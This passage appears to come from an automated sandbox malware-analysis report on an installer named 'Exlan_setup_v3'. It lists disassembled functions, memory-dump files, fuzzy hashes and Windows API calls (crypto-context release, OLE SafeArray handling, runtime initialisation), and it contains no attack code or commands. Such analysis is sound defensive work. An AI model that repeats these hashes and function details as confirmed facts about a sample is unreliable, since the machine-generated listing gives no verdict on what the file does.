Part of subcall function 6CFA4010: std::_Xinvalid_argument.LIBCPMT ref: 6CFA402A

Strings

operation failed with error , xrefs: 6CFFDA49
OS_Rng: , xrefs: 6CFFDA35

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ErrorLastXinvalid_argumentstd::_
String ID: operation failed with error $OS_Rng:
API String ID: 406877150-700108173
Opcode ID: 131fa6ec1519790f4e7a903856baf7396673e4af9349c17a9542ecae2cd0b26c
Instruction ID: a2ab317884a51531420209c5f25b23253dcb1e9066238553baf566e051c75b88
Opcode Fuzzy Hash: 131fa6ec1519790f4e7a903856baf7396673e4af9349c17a9542ecae2cd0b26c
Instruction Fuzzy Hash: C24189B190C380AFE320CF69D841B9BFBE8BF99654F14492DE19987381DB759409CB63

Function 05800930 Relevance: 2.9, Strings: 2, Instructions: 435COMMON

Download Yara Rule

Strings

Gvq, xrefs: 05800A51
Gvq, xrefs: 05800B18

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID: Gvq$Gvq
API String ID: 0-16783266
Opcode ID: 0e1f5da42340b531481358fd122ac1d5b9e6a8ed227f4434f080476cc17bf377
Instruction ID: f90b96287d93e4ab8dfd3c13a4c25e2f43f47af81f03d2b2a63981793ed74a89
Opcode Fuzzy Hash: 0e1f5da42340b531481358fd122ac1d5b9e6a8ed227f4434f080476cc17bf377
Instruction Fuzzy Hash: 3902AF70A04219DFDB54CF64CC54BAEBBB2FF88318F1495AAD40AEB294DB34AD41CB51

Function 6CFFDEE0 Relevance: 1.6, APIs: 1, Instructions: 71encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 6CFA4760: __CxxThrowException@8.LIBCMT ref: 6CFA47F9

CryptReleaseContext.ADVAPI32(?,00000000,00000000,?), ref: 6CFFDF7B

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ContextCryptException@8ReleaseThrow
String ID:
API String ID: 3140249258-0
Opcode ID: b73fdd4aeda34df2f322cfb10c7d6c0165c1fe33b53b83f335922da2ff1613e0
Instruction ID: 793deafc03c8d46bcfc20ba2d30ec1fc54ab908cf7121629b92a7d4d0bb01b58
Opcode Fuzzy Hash: b73fdd4aeda34df2f322cfb10c7d6c0165c1fe33b53b83f335922da2ff1613e0
Instruction Fuzzy Hash: 0C21ACB6509340ABD200DF14C940B9BBBE8EB9A768F040A2DF85583791D771E509CBA3

Function 6CFFDD20 Relevance: 1.6, APIs: 1, Instructions: 66encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6D01F0E6,000000FF,6CFFDF67,00000000,?), ref: 6CFFDDB4

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 47c75c490e9d409c5babd9da7d4863521fa364ac4ea6a9c7af60e485d355c9cc
Instruction ID: 9fb57adc16aa81a160a500f3c6bfeb7be0dc5db3163cbc9463aeef3ec2a9d31e
Opcode Fuzzy Hash: 47c75c490e9d409c5babd9da7d4863521fa364ac4ea6a9c7af60e485d355c9cc
Instruction Fuzzy Hash: C91103B2A097519BFB10DF58C980B1A33F8EB05718F180A2DE929C3790FB75D404C7A1

Function 05804EE2 Relevance: 1.0, Instructions: 975COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3634b08ebf1ba654d033cd5cb29d268998f2e8841fe3ecfb796b589511b20e64
Instruction ID: 03ae08b9eb889aaac8aee06817bbdc143f5fae2139b2c598cb7ff3098bf6b3b0
Opcode Fuzzy Hash: 3634b08ebf1ba654d033cd5cb29d268998f2e8841fe3ecfb796b589511b20e64
Instruction Fuzzy Hash: E0727E7055E385AFD7668B789C59B9A3F78AF03304F1980DAF540DB2E2CA785844CB72

Function 05804F28 Relevance: .9, Instructions: 948COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692727783.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5800000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64dbf5de7d99a1bc83085ef37efc6efcbbf810da58d0d3055da967f36c323a99
Instruction ID: 1bee4da28543b66650375255e377d5ce5106e2f51718f76459878c986848ea5c
Opcode Fuzzy Hash: 64dbf5de7d99a1bc83085ef37efc6efcbbf810da58d0d3055da967f36c323a99
Instruction Fuzzy Hash: 0D728F7055E385AFD7668B749C59B9A3F78AF03304F1980DAF540DB2E2CAB85844CB72

Function 06B7DF40 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695908848.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a843ba1c2e61004bf88aa01448d1671cac0a7710c3ba280fe7d060a114706f4d
Instruction ID: b57764f30234ff77d522fc4163fc1465f0a68cb7a47d1ed76ef210c7d52e5302
Opcode Fuzzy Hash: a843ba1c2e61004bf88aa01448d1671cac0a7710c3ba280fe7d060a114706f4d
Instruction Fuzzy Hash: D0810BB0D04228CFEBA4DF65C885BADBBB6FF49301F1090E9D419AB251DB709986CF40

Function 06B60006 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695908848.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a1858ef8a51f4fabd574e89e217de7eb5cbab9ea2aec95ba3021fbfab969671
Instruction ID: 4de9c1ba188ebf4d26caf462a8b67615caacdd8ae55ea2dda3af15643d6fd461
Opcode Fuzzy Hash: 9a1858ef8a51f4fabd574e89e217de7eb5cbab9ea2aec95ba3021fbfab969671
Instruction Fuzzy Hash: A6313AB1D093558FEB69CF27CD5468ABBF3AF8A300F09C0FAD448A6255D7780A468F51

Function 6CFA6650 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c2a4e5319b11e48729058604c95f45a5f512c01db7aed5589e00d7c185c0113
Instruction ID: a22ad07eac47101831546e88ea122d25395263ac275966194fbe601bb7bee5fe
Opcode Fuzzy Hash: 6c2a4e5319b11e48729058604c95f45a5f512c01db7aed5589e00d7c185c0113
Instruction Fuzzy Hash: 6321E7367165528BD705CE2EC8808A6B7A7EF8D31472D81F9E808CF293CA70E916C7D0

Function 6CFA8B30 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 519b3b72f4d0e40bab733eecf5f1683974662187ffa70974d5324fa566ddd64b
Instruction ID: bcfce7721ba4d01dc1d2ee9ad933d1dc4975959fc7d570f140c0b26dbf8c4eaf
Opcode Fuzzy Hash: 519b3b72f4d0e40bab733eecf5f1683974662187ffa70974d5324fa566ddd64b
Instruction Fuzzy Hash: 77218E757056874BE715CF2EC84059BBBA3EFD9300B1980A7E858DB242C674E866CBC0

Function 6CFAA7E0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef0fe430f5274c6fa702dd06a168edf7b4634a1fa37fbabfcf4ba1ecb026e4e8
Instruction ID: bd7b38354effb721f8da013543594d6d06a043a57fbf8dc52ccfdfca06a1beb0
Opcode Fuzzy Hash: ef0fe430f5274c6fa702dd06a168edf7b4634a1fa37fbabfcf4ba1ecb026e4e8
Instruction Fuzzy Hash: 56110631A156924BD3058E2DC8406C6BBA7AFCE710B0A81EAE854DF217C774981BC7D0

Function 6CFAC7B0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 491a25c253d72754cd753df5ea73fe4730b8206852d94c2a89a3efade510d907
Instruction ID: 9853562cbe52483d4c71d7ac33750200d2ca3620cb0e33c29f5a5b8eb5e2a188
Opcode Fuzzy Hash: 491a25c253d72754cd753df5ea73fe4730b8206852d94c2a89a3efade510d907
Instruction Fuzzy Hash: 8711E93970AA424BF309CE2EE840483B793AFCD31476A85AEA454DF146C772E416C681

Function 06B60040 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695908848.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68e15a6f4a0ce6985f47ad20da67583893a4adf3726bb5866b3dfe1b791e5db2
Instruction ID: 2dd97406a847e9d5920952b6a97cb4567bd41b3724404e379ad82f6ef1aab5e9
Opcode Fuzzy Hash: 68e15a6f4a0ce6985f47ad20da67583893a4adf3726bb5866b3dfe1b791e5db2
Instruction Fuzzy Hash: BA21EBB1D056198BEB6CCF5BD94479EFAF7AFC8300F04D0FA991CA6254DB740A869E40

Function 6D0084B0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d910f61b167587ce366bce06852fd8caa6e8ed4bc5670566e2080e4aa74bef14
Instruction ID: 51ed62e80dd3f6ec1999ee28ed9158e502da395480348f804b9dea7e7e741c6c
Opcode Fuzzy Hash: d910f61b167587ce366bce06852fd8caa6e8ed4bc5670566e2080e4aa74bef14
Instruction Fuzzy Hash: 16115E72908609EFD704CF59D941BAAFBF4FB45721F10822EE81993B80D735A950CB90

Function 6D016FB1 Relevance: 54.3, APIs: 36, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

APIs

operator+.LIBCMT ref: 6D016FCC

Part of subcall function 6D014147: DName::DName.LIBCMT ref: 6D01415A
Part of subcall function 6D014147: DName::operator+.LIBCMT ref: 6D014161

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: NameName::Name::operator+operator+
String ID:
API String ID: 2937105810-0
Opcode ID: b912afd14998ab19867f448c9546ad611452b6e345e39701f2f0a8ed7ba69701
Instruction ID: 3fd9e9656a0c1845d85d074cd3fd347d6538e5518d75cf6ca0c5b4bb73c4943c
Opcode Fuzzy Hash: b912afd14998ab19867f448c9546ad611452b6e345e39701f2f0a8ed7ba69701
Instruction Fuzzy Hash: 33D12FB5D08209EFEB01DFE8CC85BEDBBF4AF48314F11815AE615A7290DB359A45CB50

Function 6D00EC9D Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6D00A2D4,6D0395C0,00000008,6D00A468,?,?,?,6D0395E0,0000000C,6D00A523,?), ref: 6D00ECA5
__mtterm.LIBCMT ref: 6D00ECB1

Part of subcall function 6D00E97C: DecodePointer.KERNEL32(0000000D,6D00A397,6D00A37D,6D0395C0,00000008,6D00A468,?,?,?,6D0395E0,0000000C,6D00A523,?), ref: 6D00E98D
Part of subcall function 6D00E97C: TlsFree.KERNEL32(00000009,6D00A397,6D00A37D,6D0395C0,00000008,6D00A468,?,?,?,6D0395E0,0000000C,6D00A523,?), ref: 6D00E9A7
Part of subcall function 6D00E97C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6D00A397,6D00A37D,6D0395C0,00000008,6D00A468,?,?,?,6D0395E0,0000000C,6D00A523,?), ref: 6D012325
Part of subcall function 6D00E97C: DeleteCriticalSection.KERNEL32(00000009,?,?,6D00A397,6D00A37D,6D0395C0,00000008,6D00A468,?,?,?,6D0395E0,0000000C,6D00A523,?), ref: 6D01234F

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6D00ECC7
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6D00ECD4
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6D00ECE1
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6D00ECEE
TlsAlloc.KERNEL32(?,?,6D00A2D4,6D0395C0,00000008,6D00A468,?,?,?,6D0395E0,0000000C,6D00A523,?), ref: 6D00ED3E
TlsSetValue.KERNEL32(00000000,?,?,6D00A2D4,6D0395C0,00000008,6D00A468,?,?,?,6D0395E0,0000000C,6D00A523,?), ref: 6D00ED59
__init_pointers.LIBCMT ref: 6D00ED63
EncodePointer.KERNEL32(?,?,6D00A2D4,6D0395C0,00000008,6D00A468,?,?,?,6D0395E0,0000000C,6D00A523,?), ref: 6D00ED74
EncodePointer.KERNEL32(?,?,6D00A2D4,6D0395C0,00000008,6D00A468,?,?,?,6D0395E0,0000000C,6D00A523,?), ref: 6D00ED81
EncodePointer.KERNEL32(?,?,6D00A2D4,6D0395C0,00000008,6D00A468,?,?,?,6D0395E0,0000000C,6D00A523,?), ref: 6D00ED8E
EncodePointer.KERNEL32(?,?,6D00A2D4,6D0395C0,00000008,6D00A468,?,?,?,6D0395E0,0000000C,6D00A523,?), ref: 6D00ED9B
DecodePointer.KERNEL32(Function_0006EB00,?,?,6D00A2D4,6D0395C0,00000008,6D00A468,?,?,?,6D0395E0,0000000C,6D00A523,?), ref: 6D00EDBC
__calloc_crt.LIBCMT ref: 6D00EDD1
DecodePointer.KERNEL32(00000000,?,?,6D00A2D4,6D0395C0,00000008,6D00A468,?,?,?,6D0395E0,0000000C,6D00A523,?), ref: 6D00EDEB
GetCurrentThreadId.KERNEL32 ref: 6D00EDFD

Strings

FlsAlloc, xrefs: 6D00ECC1
FlsFree, xrefs: 6D00ECE3
FlsSetValue, xrefs: 6D00ECD6
FlsGetValue, xrefs: 6D00ECC9
KERNEL32.DLL, xrefs: 6D00ECA0

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 1868149495-3819984048
Opcode ID: 1632a7f75795e8bf4b1d95ea58832194fad87b27b8564e3455203560477e980f
Instruction ID: 6481802a8054ea6129011a4866f6fa37aa1693893cfb04dd2174a6d912410d9e
Opcode Fuzzy Hash: 1632a7f75795e8bf4b1d95ea58832194fad87b27b8564e3455203560477e980f
Instruction Fuzzy Hash: 18316B31905355FAFF20FF759A19F2A3BF4EB5AA21710052AE924E3290DB3080C4CF99

Function 6CFB0EA0 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 337COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CFB0EF2
std::_Xinvalid_argument.LIBCPMT ref: 6CFB0F14
_memmove.LIBCMT ref: 6CFB0F70
_memmove.LIBCMT ref: 6CFB0FDB
_memmove.LIBCMT ref: 6CFB1182
std::_Xinvalid_argument.LIBCPMT ref: 6CFB11B6

Strings

invalid string position, xrefs: 6CFB11B1
string too long, xrefs: 6CFB0EED, 6CFB0F0F

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: invalid string position$string too long
API String ID: 256744135-4289949731
Opcode ID: 039d03d1b4190dbdeb13285f7e6b871060010747d4711bda0a278f3731cb234e
Instruction ID: 6d3a6365f278b87bbd1d5dd6ed0f599845a456cdf705e08544f34048dc2f7efc
Opcode Fuzzy Hash: 039d03d1b4190dbdeb13285f7e6b871060010747d4711bda0a278f3731cb234e
Instruction Fuzzy Hash: 93B18171314144ABEB28CE1DDD90E5FB3AAEB85744718891CF896DBB81C770EC41CBA1

Function 6CFCD790 Relevance: 21.3, APIs: 14, Instructions: 283COMMON

Download Yara Rule

APIs

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

std::exception::exception.LIBCMT ref: 6CFCD861
__CxxThrowException@8.LIBCMT ref: 6CFCD878
VariantInit.OLEAUT32(?), ref: 6CFCD8EC
VariantInit.OLEAUT32 ref: 6CFCD902
VariantInit.OLEAUT32(?), ref: 6CFCD90D
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CFCD929
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CFCD966
VariantClear.OLEAUT32(?), ref: 6CFCD973
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CFCD9B4
VariantClear.OLEAUT32(?), ref: 6CFCD9C1
SafeArrayDestroy.OLEAUT32(?), ref: 6CFCDA6F
VariantClear.OLEAUT32(?), ref: 6CFCDA80
VariantClear.OLEAUT32(?), ref: 6CFCDA87
VariantClear.OLEAUT32(?), ref: 6CFCDA99

Part of subcall function 6CFBDB30: VariantInit.OLEAUT32(6CFC31EC), ref: 6CFBDB5E
Part of subcall function 6CFBDB30: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CFBDB6E
Part of subcall function 6CFBDB30: SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CFBDB82
Part of subcall function 6CFBDB30: SafeArrayDestroy.OLEAUT32(00000000), ref: 6CFBDBF1
Part of subcall function 6CFBDB30: VariantClear.OLEAUT32(?), ref: 6CFBDBFB

Part of subcall function 6CFC56B0: VariantInit.OLEAUT32(?), ref: 6CFC570E
Part of subcall function 6CFC56B0: VariantCopy.OLEAUT32(?,00000000), ref: 6CFC5716

Part of subcall function 6CFC6880: VariantInit.OLEAUT32(?), ref: 6CFC68B2
Part of subcall function 6CFC6880: VariantInit.OLEAUT32(?), ref: 6CFC68BD
Part of subcall function 6CFC6880: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CFC68D7
